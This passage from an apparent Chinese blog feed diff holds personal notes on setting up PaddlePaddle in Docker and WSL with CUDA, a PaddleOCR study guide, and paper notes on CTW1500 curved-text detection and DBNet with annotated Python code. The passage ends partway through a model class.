    ​ 案例,拉取 Paddle 镜像(由于 Windows 不可以使用 Nvidia-docker,所以只能装 CPU 版本的),在 powershell 里运行(但是在 Ubuntu 下的子系统居然都可以运行,居然是相通的?):

    docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter

    创建容器

    ​ 装好后,创建容器:

    docker run --name paddle_docker_jupyter -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter /bin/bash
    • --name paddle_docker-jupyter:设定 Docker 的名称,paddle_docker 是自己设置的名称;
    • -it:参数说明容器已和本机交互式运行;
    • -v $PWD:/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter:指定需要使用的 image 名称,您可以通过docker images命令查看;/bin/bash 是在 Docker 中要执行的命令。

    使用容器

    mkdir ./jupyter_docker
    chmod 777 ./jupyter_docker
    cd ./jupyter_docker
    docker run -p 80:80 --rm --env USER_PASSWD="123" -v $PWD:/home/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter
    • --rm:关闭容器后删除容器;
    • --env USER_PASSWD="123":为 jupyter 设置登录密码,123 是自己设置的密码;
    • -v $PWD:/home/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /home/paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter:指定需要使用的 image 名称,您可以通过 docker images 命令查看

    png

    ​ 这时就可以在浏览器中输入 http://localhost:80 进入 JupyterHub

    png

    ​ 这个用户名没说,好坑,查了使用 Docker 安装后,jupyter 的用户名是什么?· Issue #46931 · PaddlePaddle/Paddle (github.com)才知道是 jovyan ……

    关闭容器

    ​ 命令行下 Ctrl+C 解决。

    使用(paddleGPU)

    Nvidia-docker

    ​ 安装 cuda:

    wget https://developer.download.nvidia.com/compute/cuda/repos/wsl-ubuntu/x86_64/cuda-wsl-ubuntu.pin
    sudo mv cuda-wsl-ubuntu.pin /etc/apt/preferences.d/cuda-repository-pin-600
    wget https://developer.download.nvidia.com/compute/cuda/11.4.2/local_installers/cuda-repo-wsl-ubuntu-11-4-local_11.4.2-1_amd64.deb
    sudo dpkg -i cuda-repo-wsl-ubuntu-11-4-local_11.4.2-1_amd64.deb
    sudo apt-key add /var/cuda-repo-wsl-ubuntu-11-4-local/7fa2af80.pub
    sudo apt-get update
    sudo apt-get -y install cuda

    如需在 Linux 开启 GPU 支持,请安装 nvidia-docker

    export PATH=$PATH:/usr/lib/wsl/lib
    distribution=$(. /etc/os-release;echo $ID$VERSION_ID)
    curl -s -L https://nvidia.github.io/nvidia-docker/gpgkey | sudo apt-key add -
    curl -s -L https://nvidia.github.io/nvidia-docker/$distribution/nvidia-docker.list | sudo tee /etc/apt/sources.list.d/nvidia-docker.list
    curl -s -L https://nvidia.github.io/libnvidia-container/experimental/$distribution/libnvidia-container-experimental.list | sudo tee /etc/apt/sources.list.d/libnvidia-container-experimental.list
    sudo apt-get update
    sudo apt-get install -y nvidia-docker2

    nvidia-docker 命令老是不成功,查到 docker 启动容器报错 Unknown runtime specified nvidia. - luwanglin - 博客园 (cnblogs.com) 终于知道发生甚么事了,坑死我了。

    ​ 设置好配置文件,添加 nvidia 属性:

    "runtimes": {
    "nvidia": {
    "path": "/usr/bin/nvidia-container-runtime",
    "runtimeArgs": []
    }
    }

    png

    获取镜像

    ​ 无聊的等待下载时间……妈的 12GB 慢死我了。

    nvidia-docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1-gpu-cuda10.2-cudnn7.6-trt7.0

    创建容器

    nvidia-docker run --name paddle_gpu_docker -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-gpu-cuda10.2-cudnn7.6-trt7.0 /bin/bash

    查看 GPU 是否可用

    import paddle
    paddle.fluid.is_compiled_with_cuda()
    True

    关闭容器

    exit

    第二次使用

    ​ 启动:

    docker start paddle_gpu_docker

    ​ 进入:

    docker attach paddle_gpu_docker
    ]]>
    @@ -5515,7 +5515,7 @@ /posts/Paddle-%E5%8A%A8%E6%89%8B%E5%AD%A6%20OCR/ - 资源

    https://pan.baidu.com/s/1e3Iu69dMDE_A38qAMgvJhg 提取码: obf3

    2 序言

    jpg

    3 如何使用本书

    教你怎么安装 PaddleOCR。

    • ~~paddlepaddle CPU 版本(智算中心的 NPU 连华为工作人员都搞不定,只好用 CPU 了)~~还是寄,绝!
    conda create -n PaddleOCR python=3.7
    source activate PaddleOCR
    python -m pip install paddlepaddle==2.4.2 -i https://mirror.baidu.com/pypi/simple
    • paddlepaddle GPU 版本(就在自己的 Ubuntu 下装了)寄了
    conda create -n PaddleOCR python=3.7
    conda activate PaddleOCR
    python -m pip install paddlepaddle-gpu==2.4.2 -i https://mirror.baidu.com/pypi/simple
    • 安装 paddleocr
    pip install --upgrade pip
    pip install paddleocr
    • 安装 Jupyter Notebook:
    sudo apt update 
    sudo apt upgrade
    sudo apt install python3-pip
    sudo pip3 install --upgrade pip
    sudo pip3 install notebook

    运行 Jupyter Notebook:

    jupyter notebook

    会得到一串 url,用 Windows 下的浏览器打开它:

    jpg

    https://github.com/PaddlePaddle/PaddleOCR 里加载仓库,然后:

    cd PaddleOCR
    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    4 OCR 技术导论

    4.1 OCR 技术的应用场景

目前常说的 OCR 一般指场景文字识别(Scene Text Recognition,STR),主要面向自然场景。

    4.2 OCR 前沿算法

    4.2.1 文本检测

    jpg

    4.2.2 文本识别

规则文本识别的算法根据解码方式的不同,可以大致分为基于 CTC 和基于 Sequence2Sequence 两种,二者将网络学习到的序列特征转化为最终识别结果的处理方式不同。

    CTC 全称 Connectionist temporal classification,是一种常用在语音识别、文本识别等领域的算法,用来解决输入和输出序列长度不一、无法对齐的问题。

    jpg
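
CTC 解码的核心是"先合并相邻重复、再删掉 blank"的多对一映射,用几行和框架无关的 Python 就能示意:

# 玩具版 CTC 解码映射(blank 记为 0)
def ctc_collapse(seq, blank=0):
    out = []
    prev = None
    for s in seq:
        if s != prev and s != blank:
            out.append(s)
        prev = s
    return out

# 两条不同的对齐路径坍缩到同一个输出,这正是 CTC 解决"无法对齐"的方式
print(ctc_collapse([1, 1, 0, 1, 2, 2]))  # [1, 1, 2]
print(ctc_collapse([1, 0, 0, 1, 0, 2]))  # [1, 1, 2]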

    4.2.3 文档结构化识别

    • 版面分析

    jpg

    • 表格识别

    jpg

    • 关键信息提取(KIE)

    jpg

    4.3.2 产业级 OCR 开发套件 PaddleOCR

    jpg

    • 模型算法
      • 4 种文本检测算法
      • 8 种文本识别算法
      • 1 种端到端文本识别算法
    • 预训练模型库
      • PP-OCR,包含了 3 个模块,分别是:文本检测模块、检测框矫正模块、文本识别模块
      • PP-Structure,支持版面分析(layout analysis)、表格识别(table recognition)、文档视觉问答(DocVQA)三种子任务
    • 工业级部署
      • 基于 Paddle Inference 的服务器端预测方案
    • 数据工具
      • 半自动数据标注工具 PPOCRLabel
      • 数据合成工具 Style-Text

    5 文本检测

    5.1 文本检测方法介绍

    jpg

    5.1.1 基于回归的文本检测

    基于回归文本检测方法和目标检测算法的方法相似,文本检测方法只有两个类别,图像中的文本视为待检测的目标,其余部分视为背景。

    • 水平文本检测

      • TextBoxes

      • CTPN

    • 任意角度文本检测

      • TextBoxes++
      • EAST
      • MOST
    • 弯曲文本检测

      • CTD
      • LOMO
      • Contournet
      • PCR

    5.1.2 基于分割的文本检测

    基于回归的方法虽然在文本检测上取得了很好的效果,但是对解决弯曲文本往往难以得到平滑的文本包围曲线,并且模型较为复杂不具备性能优势。于是研究者们提出了基于图像分割的文本分割方法,先从像素层面做分类,判别每一个像素点是否属于一个文本目标,得到文本区域的概率图,通过后处理方式得到文本分割区域的包围曲线。

    jpg

    此类方法通常是基于分割的方法实现文本检测,基于分割的方法对不规则形状的文本检测有着天然的优势。
    基于分割的文本检测方法主体思想为,通过分割方法得到图像中文本区域,再利用 opencv,polygon 等后处理得到文本区域的最小包围曲线。

    • Pixellink
    • MSR
    • PSENet
    • Seglink++
    • PAN
    • DBNet,针对基于分割的方法需要使用阈值进行二值化处理而导致后处理耗时的问题
    • FCENet,将文本包围曲线用傅立叶变换的参数表示

    5.2 文本检测算法 DBNet 实战

    5.2.1 快速使用

    wsl2 下安装失败,我的 CUDA 版本太新了。

    安装 paddleocr whl 包:

    pip install --upgrade pip
    pip install paddleocr -i https://pypi.tuna.tsinghua.edu.cn/simple

    命令行调用文本检测模型预测图像 ./test.jpg

# --image_dir 指向要预测的图像路径;--rec false 表示不使用文本识别,只执行文本检测
! paddleocr --image_dir ./test.jpg --rec false

    然后就会喜提错误 ImportError: libcudart.so.10.2: cannot open shared object file: No such file or directory。因为自己的 CUDA 是 11.5 的,没有 10.2 的 libcudart.so.10.2

    报错解决:libcudart.so.10.2: cannot open shared object file: No such file or directory_Love 绘梨衣的 Mr.lu 的博客-CSDN 博客 里下载 libcudart.so.10.2,并把它放到 cuda 的安装目录中。


    sudo cp -i libcudart.so.10.2 /usr/lib/cuda/lib64

Configure $LD_LIBRARY_PATH:

    export LD_LIBRARY_PATH=/usr/lib/cuda/lib64:$LD_LIBRARY_PATH

It turns out this machine doesn't even have cuDNN installed.

Download cuDNN from cuDNN Download | NVIDIA Developer (it must be the build for CUDA 10.2), which yields cudnn-10.2-linux-x64-v7.6.5.32.tgz. Extract it:

    tar -zxvf cudnn-10.2-linux-x64-v7.6.5.32.tgz 

Then copy these files into the CUDA directory:

    sudo cp cuda/lib64/* /usr/lib/cuda/lib64
    sudo cp cuda/include/* /usr/lib/cuda/include/

5.2.2 DBNet in Detail

The DB text detection model consists of three parts:

• a Backbone network that extracts image features
• an FPN network, a feature-pyramid structure that enhances the features
• a Head network that computes the text-region probability map

6 Text Recognition

Text recognition tasks split into two broad categories by scenario:

• Regular text recognition: mainly printed and scanned text, assumed to lie roughly along a horizontal line
• Irregular text recognition: mostly found in natural scenes; curvature, orientation, and distortion vary widely, so the text is often not horizontal and may be bent, occluded, or blurred


6.1 Overview of Text Recognition Methods

• Classical pipeline
  • Image preprocessing
  • Character segmentation
  • Character recognition


6.1.1 Regular Text Recognition

    • CTC
      • CRNN
    • Seq2Seq


6.1.2 Irregular Text Recognition

• Rectification-based: use visual transformation modules to warp irregular text into roughly regular text, then recognize it with conventional methods.
  • RARE
• Attention-based: model the correlations between parts of the sequence. The idea was first proposed for machine translation, where the current output word is mainly determined by a few source words, which should therefore receive larger weights.
  • R^2AM
• Segmentation-based: treat each character of the text line as an independent unit; recognizing individually segmented characters is easier than rectifying and then recognizing the whole line.
  • FCN
• Transformer-based
  • SRN
  • NRTR
  • SRACN

6.2 Hands-On with the CRNN Text Recognition Algorithm

7 The PP-OCR System and Its Optimization Strategies

7.1.1 Overview of the PP-OCR System and Its Optimization Strategies

• Run text detection to obtain polygon information for each text region (PP-OCR detects with DBNet, so it obtains four corner points per region).
• Crop each text polygon and rectify it with a perspective transform into a rectangle, then correct its orientation with a direction classifier.
• Run text recognition on the rectified rectangular region to obtain the final result (a Python sketch of the whole pipeline follows).
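
A minimal sketch of this three-stage pipeline through the Python API; this matches the 2.x-era paddleocr interface, flag names may differ in newer releases, and ./test.jpg is the sample image assumed earlier in these notes:

from paddleocr import PaddleOCR

# use_angle_cls enables the direction classifier between detection and recognition
ocr = PaddleOCR(use_angle_cls=True, lang='ch')
result = ocr.ocr('./test.jpg', cls=True)

# Depending on the version, results may be nested one level per input image.
for box, (text, score) in result[0]:
    print(box, text, score)  # four corner points, recognized text, confidence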
    ]]>
@@ -5776,7 +5776,7 @@ /posts/Paper-Detecting%20Curve%20Text%20in%20the%20Wild-New%20Dataset%20and%20New%20Solution/ - Resources

Main text

    Abstract

The paper proposes:

• a dataset, CTW1500 (1000 images for training, 500 for testing)

• a polygon-based curve text detector (CTD) built on this dataset

    1 Introduction


Existing datasets contain very little curved text, and labeling such text with quadrilaterals is flawed, let alone with rectangles. As shown in Figure 1, curved bounding boxes have three notable advantages:

• they avoid overlap
• they reduce background noise
• they avoid splitting one instance across multiple text lines

A 14-point polygon is enough to localize every kind of curved text region.

On the proposed dataset, the results show that a CTD with a lightly reduced ResNet-50 detects curved text effectively.

Existing techniques all perform poorly at detecting curved text.

    3. CTW1500 Dataset and Annotation

Data description

The CTW1500 dataset contains:

• 1500 images
• 10751 bounding boxes (3530 of them curved)
• at least one curved text instance per image
• multiple languages, mainly Chinese and English

    Annotation


To enclose curved text, ten equidistant reference lines are created to help label an extra 10 points (in practice the extra 10 points proved sufficient to label every kind of curved text). Equidistant lines are used to simplify the labeling work and to reduce subjective interference.

Labeling one curved text instance takes roughly three times as long as labeling a quadrilateral one.

    4.1. Network Architecture


The overall architecture of the CTD is shown in Figure 4 and can be divided into three parts: the backbone, the RPN, and the regression module.

• The backbone is usually a popular model pre-trained on ImageNet and then fine-tuned, such as VGG-16 or ResNet. The region proposal network (RPN) and the regression module are each connected to the backbone;
• the RPN generates proposals that coarsely recall the text;
• the regression module refines the proposals to make them tighter.

    4.2. Recurrent Transverse and Longitudinal Offset Connection (TLOC)

    4.3. Long Side Interpolation

    4.4. Polygonal Post Processing

Non-polygon suppression (NPS). False-positive detections are one of the major factors limiting text detection performance.

Polygonal non-maximum suppression (PNMS). Non-maximum suppression has proven very effective for object detection; PNMS extends it to polygons.
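
A minimal sketch of greedy polygon NMS in the spirit of PNMS, assuming shapely is available; the IoU threshold is an invented example value, not the paper's setting:

from shapely.geometry import Polygon

def polygon_nms(polys, scores, iou_thresh=0.3):
    # Visit polygons in descending score order, dropping any that overlap a kept one too much.
    order = sorted(range(len(polys)), key=lambda i: scores[i], reverse=True)
    keep = []
    for i in order:
        p = Polygon(polys[i])
        if all(p.intersection(Polygon(polys[j])).area / (p.union(Polygon(polys[j])).area + 1e-6) <= iou_thresh
               for j in keep):
            keep.append(i)
    return keep

boxes = [[(0, 0), (10, 0), (10, 10), (0, 10)], [(1, 1), (11, 1), (11, 11), (1, 11)]]
print(polygon_nms(boxes, [0.9, 0.8]))  # -> [0]; the overlapping lower-scoring box is suppressed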

    5. Experiments

The proposed model is effective.

    6. Conclusions and Future Work

Dataset

Download the dataset from Yuliang-Liu/Curve-Text-Detector: This repository provides train&test code, dataset, det.&rec. annotation, evaluation script, annotation tool, and ranking. (github.com):

• train_images.zip, the training images (1000)
• ctw1500_train_labels.zip, the annotations for the training images (XML format)
• test_images.zip, the test images (500)
• gt_ctw1500.zip, the annotations for the test images (txt format)

Code to visualize a training image:

import os
import xml.etree.ElementTree as ET

import cv2
import matplotlib.pyplot as plt
import numpy as np

index = 997

# Define the paths
image_dir = r'E:\dataset\CTW1500\ctw1500\train_images\\'
label_dir = r"E:\dataset\CTW1500\ctw1500\ctw1500_train_labels\\"

image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
label_path = os.path.join(label_dir, "{:04d}".format(index) + '.xml')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape

# Parse the XML annotation file
tree = ET.parse(label_path)
root = tree.getroot()

# Iterate over the images
for image_elem in root.findall("image"):
    file_name = image_elem.get("file")

    # Iterate over the annotation boxes
    for box_elem in image_elem.findall("box"):
        box_height = int(box_elem.get('height'))
        box_width = int(box_elem.get('width'))
        box_left = int(box_elem.get('left'))
        box_top = int(box_elem.get('top'))

        print(f"Box height: {box_height}")
        print(f"Box width: {box_width}")
        print(f"Box left: {box_left}")
        print(f"Box top: {box_top}")

        # Read the <segs> text and split it on commas
        segs = box_elem.find('./segs')
        segs_values = segs.text.split(',')

        segs_x = []
        segs_y = []
        print("Segments:")
        for i in range(0, len(segs_values), 2):
            segs_x.append(int(segs_values[i]))
            segs_y.append(int(segs_values[i + 1]))
        segs = np.array([segs_x, segs_y], np.int32).T
        print(f"segs_x: {segs_x}, y: {segs_y}")

        transcriptions = box_elem.find("label").text

        # Collect all <pts> tags
        pts_elems = box_elem.findall("pts")

        # Extract the point coordinates
        pts_x = []
        pts_y = []
        for pts_elem in pts_elems:
            pts_x.append(int(pts_elem.get("x")))
            pts_y.append(int(pts_elem.get("y")))
        pts = np.array([pts_x, pts_y], np.int32).T
        # Print the annotation info
        print("File: ", file_name)
        print("Transcriptions: ", transcriptions)
        print("Points: ", pts)

        # Draw the annotations
        cv2.rectangle(image, (box_left, box_top), (box_left + box_width, box_top + box_height), (255, 255, 0), thickness=2)
        cv2.polylines(image, [segs], isClosed=False, color=(255, 255, 255), thickness=2)
        cv2.polylines(image, [pts], isClosed=False, color=(255, 0, 0), thickness=2)

        for p in pts:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

        cv2.putText(image, transcriptions, (pts_x[0], pts_y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()

The printed output:
    Box height: 108
    Box width: 565
    Box left: 201
    Box top: 351
    Segments:
    segs_x: [216, 302, 389, 476, 563, 651, 739, 766, 671, 576, 482, 388, 294, 201], y: [351, 383, 398, 407, 409, 391, 363, 406, 440, 458, 459, 451, 432, 398]
    File: 0997.jpg
    Transcriptions: VIOLENCE NEVER BRINGS
    Points: [[228 381]
    [245 390]
    [268 395]
    [289 406]
    [323 415]
    [352 422]
    [388 426]
    [417 431]
    [439 432]
    [473 436]
    [508 434]
    [540 433]
    [566 432]
    [601 429]
    [616 425]
    [634 421]
    [666 414]
    [683 406]
    [697 402]
    [722 392]
    [741 387]]
    Box height: 111
    Box width: 529
    Box left: 228
    Box top: 434
    Segments:
    segs_x: [251, 331, 411, 491, 571, 651, 731, 757, 669, 581, 493, 405, 316, 228], y: [437, 460, 474, 484, 479, 459, 434, 489, 528, 540, 545, 533, 522, 499]
    File: 0997.jpg
    Transcriptions: PERMANENT PEACE
    Points: [[259 475]
    [290 484]
    [319 487]
    [358 495]
    [396 505]
    [435 507]
    [472 511]
    [505 512]
    [543 513]
    [578 506]
    [613 499]
    [645 493]
    [682 481]
    [709 471]
    [731 464]]
    Box height: 96
    Box width: 37
    Box left: 466
    Box top: 127
    Segments:
    segs_x: [501, 501, 501, 502, 502, 502, 503, 466, 466, 466, 467, 467, 467, 468], y: [127, 143, 159, 175, 191, 207, 223, 220, 204, 189, 173, 158, 142, 127]
    File: 0997.jpg
    Transcriptions: LOC
    Points: [[486 141]
    [484 168]
    [485 205]]


Code to visualize a test image:

import os

import cv2
import matplotlib.pyplot as plt
import numpy as np

index = 1200

image_dir = r'E:\dataset\CTW1500\ctw1500\test_images\\'
label_dir = r'E:\dataset\CTW1500\ctw1500\gt_ctw1500\\'

image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
label_path = os.path.join(label_dir, "{:07d}".format(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    # Each line is "x1,y1,x2,y2,...,####transcription"
    coords_text = annotation.strip().split(',####')
    coords = list(map(int, coords_text[0].split(',')))
    points = np.array([(coords[i], coords[i + 1]) for i in range(0, len(coords), 2)])
    transcriptions = coords_text[1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)

    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()


    ]]>
@@ -5805,7 +5805,7 @@ /posts/Paper-Real-Time%20Scene%20Text%20Detection%20with%20Differentiable%20Binarization/ - Resources

Main text

    Abstract

• Segmentation-based scene text detection (which yields pixel-level predictions) can describe scene text of arbitrary shape, such as curved text, more precisely
• Binarization post-processing, which converts the probability map produced by segmentation into text bounding boxes/regions, is essential for segmentation-based detection
• The paper proposes a module called Differentiable Binarization (DB) that performs the binarization step inside the segmentation network
• It works well.

    Introduction

The paper's main contribution is the differentiable DB module, which makes the binarization step end-to-end trainable inside a CNN.

• Most existing detection methods use a similar post-processing pipeline (following the blue arrows in the figure):
  • first, a fixed threshold converts the probability map produced by the segmentation network into a binary image;
  • then, heuristics such as pixel clustering group the pixels into text instances.
• Our pipeline (the red arrows in the figure) instead inserts the binarization operation into the segmentation network for joint optimization. This way the threshold at every image location is predicted adaptively, which fully separates the pixels into foreground and background. The standard binarization function is not differentiable, however, so an approximate function called Differentiable Binarization (DB) is proposed, which is fully differentiable when trained together with the segmentation network.

Recent scene text detection methods fall roughly into two categories: regression-based and segmentation-based.

• Regression-based methods directly regress the bounding boxes of text instances.

• Segmentation-based methods usually combine pixel-level prediction with post-processing algorithms to obtain the bounding boxes.

• Fast scene text detection methods pursue both accuracy and inference speed.

    Methodology


# -*- coding: utf-8 -*-
# @Time : 2019/8/23 21:57
# @Author : zhoujun
from addict import Dict
from torch import nn
import torch.nn.functional as F

from models.backbone import build_backbone
from models.neck import build_neck
from models.head import build_head


class Model(nn.Module):
    def __init__(self, model_config: dict):
        """
        PANnet
        :param model_config: model configuration
        """
        super().__init__()
        model_config = Dict(model_config)  # a config dict describing the model structure, wrapped in Dict for attribute access
        # Pull the backbone, neck, and head types out of the config (removing them from it).
        backbone_type = model_config.backbone.pop('type')
        neck_type = model_config.neck.pop('type')
        head_type = model_config.head.pop('type')
        # Build the parts of the model with build_backbone, build_neck, and build_head.
        self.backbone = build_backbone(backbone_type, **model_config.backbone)
        self.neck = build_neck(neck_type, in_channels=self.backbone.out_channels, **model_config.neck)
        self.head = build_head(head_type, in_channels=self.neck.out_channels, **model_config.head)
        # self.name stores the model name, combining the backbone, neck, and head types.
        self.name = f'{backbone_type}_{neck_type}_{head_type}'

    def forward(self, x):
        _, _, H, W = x.size()  # x is the input tensor of shape [batch_size, channels, height, width]
        backbone_out = self.backbone(x)  # run the backbone on the input
        neck_out = self.neck(backbone_out)  # run the neck on the backbone output
        y = self.head(neck_out)  # run the head to obtain the final output y
        y = F.interpolate(y, size=(H, W), mode='bilinear', align_corners=True)  # resize y back to the input resolution
        return y


if __name__ == '__main__':
    import torch

    device = torch.device('cpu')  # CPU device (switch to GPU if available)
    x = torch.zeros(2, 3, 640, 640).to(device)  # a zero tensor of shape [2, 3, 640, 640] as dummy input

    model_config = {
        'backbone': {'type': 'resnest50', 'pretrained': True, "in_channels": 3},
        'neck': {'type': 'FPN', 'inner_channels': 256},  # segmentation neck, FPN or FPEM_FFM
        'head': {'type': 'DBHead', 'out_channels': 2, 'k': 50},
    }
    model = Model(model_config=model_config).to(device)  # build the Model from the config dict
    import time  # time the forward pass

    tic = time.time()
    y = model(x)
    # Print the forward-pass time, the output shape, the model name, and the full model structure.
    print(time.time() - tic)
    print(y.shape)
    print(model.name)
    print(model)
    # (Optional) save the model state dict to PAN.pth.
    # torch.save(model.state_dict(), 'PAN.pth')
• ResNet
• MobileNetV3
• ShuffleNetV2
• FPN

  • This code implements a feature pyramid network (FPN) module that fuses feature maps from different scales. It includes:

    • Reduce layers: shrink each feature map's channel count to a smaller value.

    • Smooth layers: smooth the feature map at each level.

    • Fusion and upsampling: upsample and concatenate feature maps across levels to enrich the representation.

    • A final convolution: further process the fused feature map to produce the output.

import torch
import torch.nn.functional as F
from torch import nn

from models.basic import ConvBnRelu


class FPN(nn.Module):
    def __init__(self, in_channels, inner_channels=256, **kwargs):
        """
        :param in_channels: output dimensions of the backbone
        :param kwargs:
        """
        super().__init__()
        inplace = True
        self.conv_out = inner_channels
        inner_channels = inner_channels // 4  # channel count used inside the fusion
        # Reduce layers: 1x1 convolutions that shrink each level's channels to inner_channels.
        self.reduce_conv_c2 = ConvBnRelu(in_channels[0], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c3 = ConvBnRelu(in_channels[1], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c4 = ConvBnRelu(in_channels[2], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c5 = ConvBnRelu(in_channels[3], inner_channels, kernel_size=1, inplace=inplace)
        # Smooth layers: further process the feature map at each level.
        self.smooth_p4 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
        self.smooth_p3 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
        self.smooth_p2 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)

        self.conv = nn.Sequential(
            nn.Conv2d(self.conv_out, self.conv_out, kernel_size=3, padding=1, stride=1),
            nn.BatchNorm2d(self.conv_out),
            nn.ReLU(inplace=inplace)
        )  # conv + batch norm + ReLU applied to the fused feature map
        self.out_channels = self.conv_out  # channel count of the output feature map

    def forward(self, x):
        c2, c3, c4, c5 = x  # a tuple of four feature maps (c2, c3, c4, c5) from different backbone stages
        # Top-down pathway
        p5 = self.reduce_conv_c5(c5)
        p4 = self._upsample_add(p5, self.reduce_conv_c4(c4))
        p4 = self.smooth_p4(p4)
        p3 = self._upsample_add(p4, self.reduce_conv_c3(c3))
        p3 = self.smooth_p3(p3)
        p2 = self._upsample_add(p3, self.reduce_conv_c2(c2))
        p2 = self.smooth_p2(p2)

        x = self._upsample_cat(p2, p3, p4, p5)  # concatenate all levels along the channel dimension
        x = self.conv(x)  # final processing of the concatenated feature map
        return x

    def _upsample_add(self, x, y):
        return F.interpolate(x, size=y.size()[2:]) + y  # upsample x to y's size and add them

    def _upsample_cat(self, p2, p3, p4, p5):  # upsample p3, p4, p5 to p2's size, then concatenate on channels
        h, w = p2.size()[2:]
        p3 = F.interpolate(p3, size=(h, w))
        p4 = F.interpolate(p4, size=(h, w))
        p5 = F.interpolate(p5, size=(h, w))
        return torch.cat([p2, p3, p4, p5], dim=1)
• ConvHead
  • ConvHead is a very basic, common module: a 1x1 convolution followed by a Sigmoid transforms the input feature map. It mainly produces the final output, especially when the feature map must be turned into a probability map.
import torch
from torch import nn


class ConvHead(nn.Module):
    def __init__(self, in_channels, out_channels, **kwargs):
        super().__init__()
        self.conv = nn.Sequential(
            # A 1x1 convolution: a linear transform over the channel dimension that leaves the spatial size unchanged.
            nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
            # A Sigmoid squashes the output into (0, 1), as needed when the output should be a probability map.
            nn.Sigmoid()
        )

    def forward(self, x):
        return self.conv(x)
    • DBHead
import torch
from torch import nn


class DBHead(nn.Module):
    def __init__(self, in_channels, out_channels, k=50):
        super().__init__()
        self.k = k  # amplification factor used by the step function in the forward pass
        self.binarize = nn.Sequential(  # sequential module that produces the shrink (probability) map
            nn.Conv2d(in_channels, in_channels // 4, 3, padding=1),  # 3x3 conv reducing channels to in_channels // 4
            nn.BatchNorm2d(in_channels // 4),  # batch normalization
            nn.ReLU(inplace=True),  # non-linear activation
            nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 2, 2),  # upsample (double the spatial size)
            nn.BatchNorm2d(in_channels // 4),
            nn.ReLU(inplace=True),
            nn.ConvTranspose2d(in_channels // 4, 1, 2, 2),
            nn.Sigmoid())  # outputs values in (0, 1), suitable for a probability map
        self.binarize.apply(self.weights_init)

        self.thresh = self._init_thresh(in_channels)  # build the threshold-map branch with _init_thresh
        self.thresh.apply(self.weights_init)

    def forward(self, x):
        shrink_maps = self.binarize(x)  # output of the binarize branch
        threshold_maps = self.thresh(x)  # output of the thresh branch
        if self.training:  # in training mode
            binary_maps = self.step_function(shrink_maps, threshold_maps)  # compute the approximate binary map
            y = torch.cat((shrink_maps, threshold_maps, binary_maps), dim=1)  # concatenate shrink, threshold, and binary maps
        else:
            y = torch.cat((shrink_maps, threshold_maps), dim=1)
        return y

    def weights_init(self, m):  # He initialization (kaiming_normal_) for conv weights; fixed values for batch norm layers
        classname = m.__class__.__name__
        if classname.find('Conv') != -1:
            nn.init.kaiming_normal_(m.weight.data)
        elif classname.find('BatchNorm') != -1:
            m.weight.data.fill_(1.)
            m.bias.data.fill_(1e-4)

    def _init_thresh(self, inner_channels, serial=False, smooth=False, bias=False):
        # Build the sequential module that produces the threshold map: conv, batch norm, ReLU, upsampling, Sigmoid.
        in_channels = inner_channels
        if serial:
            in_channels += 1
        self.thresh = nn.Sequential(
            nn.Conv2d(in_channels, inner_channels // 4, 3, padding=1, bias=bias),
            nn.BatchNorm2d(inner_channels // 4),
            nn.ReLU(inplace=True),
            self._init_upsample(inner_channels // 4, inner_channels // 4, smooth=smooth, bias=bias),
            nn.BatchNorm2d(inner_channels // 4),
            nn.ReLU(inplace=True),
            self._init_upsample(inner_channels // 4, 1, smooth=smooth, bias=bias),
            nn.Sigmoid())
        return self.thresh

    def _init_upsample(self, in_channels, out_channels, smooth=False, bias=False):
        # Upsampling module: nearest-neighbor interpolation plus convolution, or a transposed convolution.
        if smooth:  # smooth upsampling
            inter_out_channels = out_channels
            if out_channels == 1:
